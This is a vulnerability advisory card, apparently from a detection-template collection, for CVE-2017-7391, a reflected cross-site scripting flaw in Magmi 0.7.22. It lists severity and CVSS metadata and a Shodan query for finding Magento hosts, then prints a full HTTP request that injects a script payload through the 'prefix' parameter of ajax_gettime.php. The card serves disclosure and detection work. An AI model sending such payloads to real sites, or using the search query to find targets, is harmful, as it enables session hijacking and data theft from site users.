| Title | Magmi 0.7.22 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.08891 |
| CVE ID | CVE-2017-7391 |
| CWE ID | CWE-79 |
| Shodan Query | http.component:"magento" |
| Tags | cve2017 cve magmi xss magmi_project vkev vuln |
Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.
GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-7391.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-7391.pcap
N/AN/A